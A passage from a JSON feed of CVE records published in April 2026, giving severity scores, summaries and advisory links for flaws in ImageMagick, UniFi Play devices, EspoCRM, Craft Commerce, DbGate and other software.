7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/3d653bea2df085c728a1c8f775808e1e9249dff9","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pwg5-6jfc-crvh","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40311","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. Versions below 7.1.2-19 and 6.9.13-44 contain a heap use-after-free vulnerability that can cause a crash when reading and printing values from an invalid XMP profile. 
This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00015,"ranking_epss":0.03181,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/5facfecf1abb3fed46a08f614dcc43d1e548e20d","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-r83h-crwp-3vm7","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22563","summary":"A series of Improper Input Validation vulnerabilities could allow a Command Injection by a malicious actor with access to the UniFi Play network.\n \nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier) \nUniFi Play Audio Port  (Version 1.0.24 and earlier)  \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later \nUpdate UniFi Play Audio Port  to Version 1.1.9 or later","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00083,"ranking_epss":0.24152,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22564","summary":"An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to enable SSH to make unauthorized changes to the system.  
\n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier) \nUniFi Play Audio Port  (Version 1.0.24 and earlier)  \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later \nUpdate UniFi Play Audio Port  to Version 1.1.9 or later","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00015,"ranking_epss":0.02907,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22565","summary":"An Improper Input Validation vulnerability could allow a malicious actor with access to the UniFi Play network to cause the device to stop responding.  \n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier) \nUniFi Play Audio Port  (Version 1.0.24 and earlier)  \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later \nUpdate UniFi Play Audio Port  to Version 1.1.9 or later","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00011,"ranking_epss":0.0142,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22566","summary":"An Improper Access Control vulnerability could allow a malicious actor with access to the UniFi Play network to obtain UniFi Play WiFi credentials.  
\n\nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier) \nUniFi Play Audio Port  (Version 1.0.24 and earlier)  \n\nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later \nUpdate UniFi Play Audio Port  to Version 1.1.9 or later","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00011,"ranking_epss":0.01402,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33902","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, a stack overflow vulnerability in ImageMagick's FX expression parser allows an attacker to crash the process by providing a deeply nested expression. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01569,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/d3c0a37485314c5ccef72efb18f3847cd53868ba","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-f4qm-vj5j-9xpw","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33905","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, the -sample operation has an out of bounds read when a specific offset is set through the `sample:offset` define that could lead to an out of bounds read. 
This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/cca607366fb38c2dde019a9088b8415ffba3a835","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-pcvx-ph33-r5vv","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33908","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, Magick frees the memory of the XML tree via the `DestroyXMLTree()` function; however, this process is executed recursively with no depth limit imposed. When Magick processes an XML file with deeply nested structures, it will exhaust the stack memory, resulting in a Denial of Service (DoS) attack. 
This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00041,"ranking_epss":0.12417,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/ccdc01180276aa2cb3d4a32a611aa4f417061cd8","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-fwvm-ggf6-2p4x","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-22562","summary":"A malicious actor with access to the UniFi Play network could exploit a Path Traversal vulnerability found in the device firmware to write files on the system that could be used for a remote code execution (RCE).\n \nAffected Products:\nUniFi Play PowerAmp (Version 1.0.35 and earlier) UniFi Play Audio Port  (Version 1.0.24 and earlier)  \nMitigation:\nUpdate UniFi Play PowerAmp to Version 1.0.38 or later Update UniFi Play Audio Port  to Version 1.1.9 or later","cvss":9.8,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.8,"cvss_v4":null,"epss":0.00114,"ranking_epss":0.2989,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://community.ui.com/releases/Security-Advisory-Bulletin-063/e468dd4b-5090-4ef8-89d8-939903c08e83"],"published_time":"2026-04-13T22:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6216","summary":"A security vulnerability has been detected in DbGate up to 7.1.4. This affects an unknown function of the file packages/web/src/icons/FontIcon.svelte of the component SVG Icon String Handler. Such manipulation of the argument applicationIcon leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed publicly and may be used. Upgrading to version 7.1.5 mitigates this issue. 
It is advisable to upgrade the affected component.","cvss":5.1,"cvss_version":4.0,"cvss_v2":4.0,"cvss_v3":3.5,"cvss_v4":5.1,"epss":0.00031,"ranking_epss":0.08675,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/dbgate/dbgate/","https://github.com/dbgate/dbgate/releases/tag/v7.1.5","https://vuldb.com/submit/785841","https://vuldb.com/vuln/357135","https://vuldb.com/vuln/357135/cti"],"published_time":"2026-04-13T21:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6218","summary":"A vulnerability was found in aandrew-me ytDownloader up to 3.20.2. Affected by this issue is the function createTextNode of the component Error Details Panel. The manipulation results in cross site scripting. The attack may be performed from remote. The vendor was contacted early about this disclosure.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.0,"cvss_v3":4.3,"cvss_v4":5.3,"epss":0.00031,"ranking_epss":0.08611,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ngocnn97/security-advisories/blob/main/YtDownloader_XSS_To_RCE_PoC.mp4","https://vuldb.com/submit/785842","https://vuldb.com/vuln/357139","https://vuldb.com/vuln/357139/cti"],"published_time":"2026-04-13T21:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6219","summary":"A vulnerability was determined in aandrew-me ytDownloader up to 3.20.2. This affects the function child_process.exec of the file src/compressor.js of the component Compressor Feature. This manipulation causes command injection. The attack can only be executed locally. The exploit has been publicly disclosed and may be utilized. 
The vendor was contacted early about this disclosure.","cvss":4.8,"cvss_version":4.0,"cvss_v2":4.3,"cvss_v3":5.3,"cvss_v4":4.8,"epss":0.00178,"ranking_epss":0.39341,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://gist.github.com/ngocnn97/53a9f251d1cb99b1b8033e211407d1b1","https://github.com/ngocnn97/security-advisories/blob/main/YtDownloader_Command_Injection_PoC.mp4","https://vuldb.com/submit/785843","https://vuldb.com/submit/785844","https://vuldb.com/vuln/357140","https://vuldb.com/vuln/357140/cti"],"published_time":"2026-04-13T21:16:32","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33740","summary":"EspoCRM is an open source customer relationship management application. In versions 9.3.3 and below, the POST /api/v1/Email/importEml endpoint contains an Insecure Direct Object Reference (IDOR) vulnerability where the attacker-supplied fileId parameter is used to fetch any attachment directly from the repository without verifying that the current user has authorization to access it. Any authenticated user with Email:create and Import permissions can exploit this to read another user's .eml attachment contents by importing them as a new email into the attacker's mailbox, while the original victim attachment record is deleted as a side effect of the import flow. This is inconsistent with the standard attachment download path, which enforces ACL checks before returning file data, and is practically exploitable because attachment IDs are commonly exposed in normal UI and API workflows such as stream payloads and download links. 
This issue is fixed in version 9.3.4.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.0002,"ranking_epss":0.05422,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/espocrm/espocrm/commit/88e3ba6a7b5cab5dbc2298e2a093d3aa383aa95f","https://github.com/espocrm/espocrm/releases/tag/9.3.4","https://github.com/espocrm/espocrm/security/advisories/GHSA-wr7j-hxf8-hc4w"],"published_time":"2026-04-13T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33899","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-189 and 6.9.13-44, when `Magick` parses an XML file it is possible that a single zero byte is written out of the bounds. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11627,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/ae679e2fd19ec656bfab9f822ae4cf06bf91604d","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-cr67-pvmx-2pp2","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33900","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, the viff encoder contains an integer truncation/wraparound issue on 32-bit builds that could trigger an out of bounds heap write, potentially causing a crash. 
This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.9,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12475,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/d27b840a61b322419a66d0d192ff56d52498148d","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-v67w-737x-v2c9","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33901","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, a heap buffer overflow occurs in the MVG decoder that could result in an out of bounds write when processing a crafted image. This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00038,"ranking_epss":0.11187,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/4c72003e9e54a4ebaa938d239e75f5d285527ebe","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-x9h5-r9v2-vcww","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T21:16:25","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-26460","summary":"A HTML Injection vulnerability exists in the Dashboard module of Vtiger CRM 8.4.0. The application fails to properly neutralize user-supplied input in the tabid parameter of the DashBoardTab view (getTabContents action), allowing an attacker to inject arbitrary HTML content into the dashboard interface. 
The injected content is rendered in the victim's browser","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.simonjuguna.com/cve-2026-26460-html-injection-vulnerability-in-vtiger-open-source-edition-v8-4-0/","https://www.vtiger.com/open-source-crm/"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31280","summary":"An issue in the Bluetooth RFCOMM service of Parani M10 Motorcycle Intercom v2.1.3 allows unauthorized attackers to cause a Denial of Service (DoS) via supplying crafted RFCOMM frames.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.03861,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://amoebatech.gitbook.io/amoebatech-docs/cve-2026-31280-insecure-bluetooth-rfcomm-leading-to-device-crash-in-parani-m10-intercom","https://nvd.nist.gov/vuln/detail/cve-2023-4586","https://nvd.nist.gov/vuln/detail/cve-2025-20701"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32271","summary":"Craft Commerce is an ecommerce platform for Craft CMS. In versions 4.0.0 through 4.10.2 and 5.0.0 through 5.5.4, there is an SQL injection vulnerability in the Commerce TotalRevenue widget which allows any authenticated control panel user to achieve remote code execution through a four-step exploitation chain. The attack exploits unsanitized widget settings interpolated into SQL expressions, combined with PDO's default multi-statement query support, to inject a maliciously serialized PHP object into the queue table. 
When the queue consumer processes the injected job, the unrestricted unserialize() call in yii2-queue instantiates a GuzzleHttp FileCookieJar gadget chain whose __destruct() method writes a PHP webshell to the server's webroot. The complete chain requires only three HTTP requests, no administrative privileges, and results in arbitrary command execution as the PHP process user, with queue processing triggered via an unauthenticated endpoint. This issue has been fixed in versions 4.10.3 and 5.5.5.","cvss":7.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.7,"epss":0.00198,"ranking_epss":0.4186,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/craftcms/commerce/commit/6d2d24b3a2b0c06593856d05446f82bd8af92d72","https://github.com/craftcms/commerce/security/advisories/GHSA-875v-7m49-8x88"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32272","summary":"Craft Commerce is an ecommerce platform for Craft CMS. In versions 5.0.0 through 5.5.4, an SQL injection vulnerability exists where the ProductQuery::hasVariant and VariantQuery::hasProduct properties bypass the input sanitization blocklist added to ElementIndexesController in a prior security fix (GHSA-2453-mppf-46cj). The blocklist only strips top-level Yii2 Query properties such as where and orderBy, but hasVariant and hasProduct pass through untouched and internally call Craft::configure() on a subquery without sanitization, re-introducing SQL injection. Any authenticated control panel user can exploit this via boolean-based blind SQL injection to extract arbitrary database contents, including security keys that enable forging admin sessions for privilege escalation. 
This issue has been fixed in version 5.6.0.","cvss":8.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":8.7,"epss":0.0003,"ranking_epss":0.08479,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/advisories/GHSA-2453-mppf-46cj","https://github.com/craftcms/commerce/pull/4232","https://github.com/craftcms/commerce/releases/tag/5.6.0","https://github.com/craftcms/commerce/security/advisories/GHSA-r54v-qq87-px5r"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33659","summary":"EspoCRM is an open source customer relationship management application. In versions 9.3.3 and below, the POST /api/v1/Attachment/fromImageUrl endpoint is vulnerable to Server-Side Request Forgery (SSRF) via a DNS rebinding (TOCTOU) condition. Host validation uses dns_get_record() but the actual HTTP request resolves hostnames through curl's internal resolver (gethostbyname()), allowing the two lookups to return different IP addresses for the same hostname. A secondary issue exists where an empty DNS result (due to DNS failure, IPv6-only domains, or non-existent hostnames) causes the validation to implicitly allow the host without further checks. An authenticated attacker with default attachment creation access can exploit this gap to bypass internal IP restrictions and scan internal network ports, confirm the existence of internal hosts, and interact with internal HTTP-based services, though data extraction from binary protocol services and remote code execution are not possible through this endpoint. 
This issue has been fixed in version 9.3.4.","cvss":3.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":3.5,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11692,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/espocrm/espocrm/commit/dca03cc3458e487362c26c746378a2d4de9990b1","https://github.com/espocrm/espocrm/releases/tag/9.3.4","https://github.com/espocrm/espocrm/security/advisories/GHSA-6m4j-fwrx-crh7","https://github.com/espocrm/espocrm/security/advisories/GHSA-6m4j-fwrx-crh7"],"published_time":"2026-04-13T21:16:24","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-51414","summary":"In Phpgurukul Online Course Registration v3.1, an arbitrary file upload vulnerability was discovered within the profile picture upload functionality on the /my-profile.php page.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/12T40910/CVE/issues/12","https://medium.com/@tanushkushtk01/cve-2025-51414-unrestricted-file-upload-in-online-course-registration-v3-1-bd8b839be1d7"],"published_time":"2026-04-13T21:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2025-70936","summary":"Vtiger CRM 8.4.0 contains a reflected cross-site scripting (XSS) vulnerability in the MailManager module. 
Improper handling of user-controlled input in the _folder parameter allows a specially crafted, double URL-encoded payload to be reflected and executed in the context of an authenticated user's session.","cvss":5.4,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.4,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://www.simonjuguna.com/cve-2025-70936-reflected-xss-vulnerability-in-vtiger-crm-v8-4-0/","https://www.vtiger.com/open-source-crm/"],"published_time":"2026-04-13T21:16:23","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6201","summary":"A vulnerability was identified in CodeAstro Online Job Portal 1.0. The impacted element is an unknown function of the file /jobs/job-delete.php of the component Delete Job Posting Handler. Such manipulation of the argument ID leads to improper access controls. The attack can be launched remotely. The exploit is publicly available and might be used.","cvss":5.3,"cvss_version":4.0,"cvss_v2":5.5,"cvss_v3":5.4,"cvss_v4":5.3,"epss":0.00036,"ranking_epss":0.10595,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://codeastro.com/","https://github.com/Xmyronn/CodeAstro-Online-Job-Portal-IDOR.git","https://vuldb.com/submit/797515","https://vuldb.com/vuln/357123","https://vuldb.com/vuln/357123/cti"],"published_time":"2026-04-13T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6202","summary":"A security flaw has been discovered in code-projects Easy Blog Site 1.0. This affects an unknown function of the file post.php. Performing a manipulation of the argument tags results in sql injection. The attack may be initiated remotely. 
The exploit has been released to the public and may be used for attacks.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00028,"ranking_epss":0.07873,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://code-projects.org/","https://github.com/Learner636/CVE-smbmit/issues/6","https://vuldb.com/submit/797629","https://vuldb.com/vuln/357124","https://vuldb.com/vuln/357124/cti"],"published_time":"2026-04-13T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6215","summary":"A weakness has been identified in DbGate up to 7.1.4. The impacted element is the function apiServerUrl1 of the file packages/rest/src/openApiDriver.ts of the component REST/GraphQL. This manipulation causes server-side request forgery. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.","cvss":5.3,"cvss_version":4.0,"cvss_v2":6.5,"cvss_v3":6.3,"cvss_v4":5.3,"epss":0.00032,"ranking_epss":0.08994,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://vuldb.com/submit/785836","https://vuldb.com/vuln/357134","https://vuldb.com/vuln/357134/cti"],"published_time":"2026-04-13T20:16:47","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33657","summary":"EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below have a stored HTML injection vulnerability that allows any authenticated user with standard (non-administrative) privileges to inject arbitrary HTML into system-generated email notifications by crafting malicious content in the post field of stream activity notes. 
The vulnerability exists because server-side Handlebars templates render the post field using unescaped triple-brace syntax, the Markdown processor preserves inline HTML by default, and the rendering pipeline explicitly skips sanitization for fields present in additionalData, creating a path where attacker-controlled HTML is accepted, stored, and rendered directly into emails without any escaping. Since the emails are sent using the system's configured SMTP identity (such as an administrative sender address), the injected content appears fully trusted to recipients, enabling phishing attacks, user tracking via embedded resources like image beacons, and UI manipulation within email content. The @mention feature further increases the impact by allowing targeted delivery of malicious emails to specific users. This issue has been fixed in version 9.3.4.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07972,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/espocrm/espocrm/releases/tag/9.3.4","https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574","https://github.com/espocrm/espocrm/security/advisories/GHSA-8prm-r5j9-j574"],"published_time":"2026-04-13T20:16:34","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-31048","summary":"An issue in the <code>pickle</code> protocol of Pyro v3.x allows attackers to execute arbitrary code via supplying a crafted pickled string 
message.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00017,"ranking_epss":0.04032,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Sif-0x01/security-advisories/security/advisories/GHSA-7625-w9h5-83rv","https://github.com/irmen/Pyro3/blob/master/Pyro/protocol.py#L672-L711","https://github.com/irmen/Pyro3/blob/master/docs/9-security.html#L341-L346"],"published_time":"2026-04-13T20:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32270","summary":"Craft Commerce is an ecommerce platform for Craft CMS. In versions 4.0.0 through 4.10.2 and 5.0.0 through 5.5.4, the PaymentsController::actionPay discloses some order data to unauthenticated users when an order number is provided and the email check fails during an anonymous payment. The JSON error response includes the serialized order object (order), which contains some sensitive fields such as customer email, shipping address, and billing address. The frontend payment flow's actionPay() retrieves orders by number before authorization is fully enforcedLoad order by number. This issue has been fixed in versions 4.11.0 and 5.6.0.","cvss":1.7,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":1.7,"epss":0.00047,"ranking_epss":0.14409,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/craftcms/commerce/commit/48a5d946419964e2af1ac64a8e1acc2a32ca0a08","https://github.com/craftcms/commerce/releases/tag/4.11.0","https://github.com/craftcms/commerce/releases/tag/5.6.0","https://github.com/craftcms/commerce/security/advisories/GHSA-3vxg-x5f8-f5qf"],"published_time":"2026-04-13T20:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-32605","summary":"nimiq/core-rs-albatross is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. 
Prior to version 1.3.0, an untrusted peer could crash a validator by publishing a signed tendermint proposal message where signer == validators.num_validators(). ProposalSender::send uses > instead of >= for the signer bounds check, so the equality case passes and reaches validators.get_validator_by_slot_band(signer), which panics with an out-of-bounds index before any signature verification runs. This issue has been fixed in version 1.3.0.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00042,"ranking_epss":0.12475,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/nimiq/core-rs-albatross/commit/9199364b60c7acae4219800d194bbe07d2997b8c","https://github.com/nimiq/core-rs-albatross/pull/3661","https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0","https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-g99c-h7j7-rfhv"],"published_time":"2026-04-13T20:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33534","summary":"EspoCRM is an open source customer relationship management application. Versions 9.3.3 and below have an authenticated Server-Side Request Forgery (SSRF) vulnerability that allows bypassing the internal-host validation logic by using alternative IPv4 representations such as octal notation (e.g., 0177.0.0.1 instead of 127.0.0.1). This is caused by HostCheck::isNotInternalHost() function relying on PHP's filter_var(..., FILTER_VALIDATE_IP), which does not recognize alternative IP formats, causing the validation to fall through to a DNS lookup that returns no records and incorrectly treats the host as safe, however the cURL subsequently normalizes the address and connects to the loopback destination. Through the confirmed /api/v1/Attachment/fromImageUrl endpoint, an authenticated user can force the server to make requests to loopback-only services and store the fetched response as an attachment. 
This vulnerability is distinct from CVE-2023-46736 (which involved redirect-based SSRF) and may allow access to internal resources reachable from the application runtime. This issue has been fixed in version 9.3.4.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/espocrm/espocrm/releases/tag/9.3.4","https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73","https://github.com/espocrm/espocrm/security/advisories/GHSA-h7gx-8gwv-7g73"],"published_time":"2026-04-13T20:16:33","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6199","summary":"A vulnerability was found in Tenda F456 1.0.0.5. Impacted is the function fromqossetting of the file /goform/qossetting. The manipulation of the argument page results in stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been made public and could be used.","cvss":7.4,"cvss_version":4.0,"cvss_v2":9.0,"cvss_v3":8.8,"cvss_v4":7.4,"epss":0.00046,"ranking_epss":0.14172,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Litengzheng/vuldb_new/blob/main/F456/vul_116/README.md","https://vuldb.com/submit/797471","https://vuldb.com/vuln/357121","https://vuldb.com/vuln/357121/cti","https://www.tenda.com.cn/"],"published_time":"2026-04-13T19:16:58","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6200","summary":"A vulnerability was determined in Tenda F456 1.0.0.5. The affected element is the function formwebtypelibrary of the file /goform/webtypelibrary. This manipulation of the argument menufacturer/Go causes stack-based buffer overflow. The attack can be initiated remotely. 
